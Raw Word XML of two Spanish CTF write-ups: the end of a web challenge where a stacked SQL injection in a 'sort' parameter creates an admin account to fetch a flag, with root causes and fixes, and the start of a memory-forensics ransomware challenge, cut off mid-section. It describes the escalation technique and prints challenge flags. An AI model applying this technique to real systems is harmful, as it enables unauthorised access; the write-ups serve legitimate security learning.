          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El servidor generó un JWT administrativo legítimo porque la cuenta existía en la base de datos, tenía rol </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> y utilizaba un hash correspondiente a la contraseña suministrada.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>9. Obtención de la flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Finalmente, se envió el token administrativo al endpoint protegido:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>GET /api/admin/flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Authorization: Bearer &lt;JWT_VALIDO&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Respuesta:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>HTTP/1.1 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Content-Type: application/json{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>"flag": "PENTRAZE{fb52e5876c006eeb55b430f8ed6e60256cd212e3fd7d82cbbd5c337f7c044502}"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>FLAG OBTENIDA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>PENTRAZE{fb52e5876c006eeb55b430f8ed6e60256cd212e3fd7d82cbbd5c337f7c044502}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>10. Causa raíz y recomendaciones</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>El ataque fue posible por la combinación de tres condiciones:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="360" w:start="709" w:end="0"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El parámetro </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> era incorporado a una consulta SQL sin una validación suficientemente restrictiva.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="360" w:start="709" w:end="0"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">La ejecución de sentencias apiladas permitió pasar de una consulta de lectura a una operación </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>INSERT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="200"/>
        <w:ind w:hanging="360" w:start="709" w:end="0"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>La cuenta PostgreSQL utilizada por la aplicación disponía de privilegios para insertar registros en una tabla que almacenaba información de autenticación y autorización.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">La explotación provocó una </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">escalada de privilegios de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>member</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Para corregir esta clase de vulnerabilidades se recomienda validar </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> mediante una lista explícita de columnas permitidas, parametrizar los valores SQL, restringir los permisos de las cuentas de base de datos y separar los privilegios de lectura de los de administración de usuarios.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>La protección JWT funcionó al rechazar tokens inválidos, pero no pudo impedir el ataque una vez que el atacante consiguió crear una cuenta administrativa válida en la base de datos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>11. Conclusión</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El reto </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>La Receta</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> demostró cómo una SQL Injection aparentemente limitada a una función de búsqueda puede convertirse en una escalada completa de privilegios.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El descubrimiento decisivo no fue obtener la contraseña del administrador ni vulnerar la firma JWT, sino identificar que el parámetro </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> permitía sentencias apiladas y que la cuenta PostgreSQL poseía permisos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>INSERT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Reutilizando el hash de una cuenta controlada, fue posible crear un usuario administrativo, iniciar sesión y recuperar la flag.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:start="0" w:end="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Resultado final: reto completado satisfactoriamente.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before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Lives: 9, Backups: 0 — Write-up</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Competencia:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Pentraze CTF</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Categoría:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Web / Forensics</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Herramientas:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Fedora Linux, Volatility 3, Python, GNU Strings</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Estado:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Completado — 4/4 preguntas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>1. Descripción del desafío</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>La bóveda de RootCorp fue cifrada por un atacante desconocido. No existían respaldos disponibles y la única evidencia recuperada era una captura de memoria RAM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>El objetivo era investigar el incidente y responder cuatro preguntas relacionadas con el malware, la exfiltración y el secreto perdido del Codex.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>La interfaz del desafío mostraba varias pistas:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>AES-256-CTR</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>DNS EXFIL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>MEM CAPTURED</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="200"/>
        <w:ind w:hanging="283" w:start="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Extensión </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>.catlocked</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>2. Preparación del entorno</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Descargamos la evidencia </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>evidence.tar.xz</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, de aproximadamente 931 MB. Al extraerla encontramos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>codex_acquisition.MEM</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, una captura de memoria de aproximadamente 6.1 GB.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Configuramos un entorno virtual de Python e instalamos Volatility 3 para examinar la imagen de memoria.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">El análisis con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>windows.info</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> identificó un sistema Windows 10 x64, build 19041.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>3. Identificación del ejecutable malicioso</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Utilizamos los complementos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>windows.pslist</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>windows.cmdline</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>windows.pstree</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> para enumerar los procesos y reconstruir sus relaciones.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Encontramos un proceso sospechoso con PID 392, cuyo ejecutable se encontraba en:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>C:\Users\sus\Downloads\SvcHost_Kraken.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">El proceso había sido iniciado desde </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>powershell.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, con PID 8744.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Primera respuesta:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>SvcHost_Kraken.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>La plataforma la aceptó.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>4. Identificación del canal de exfiltración</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">La interfaz mostraba la pista </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>DNS EXFIL</w:t>
      </w:r>
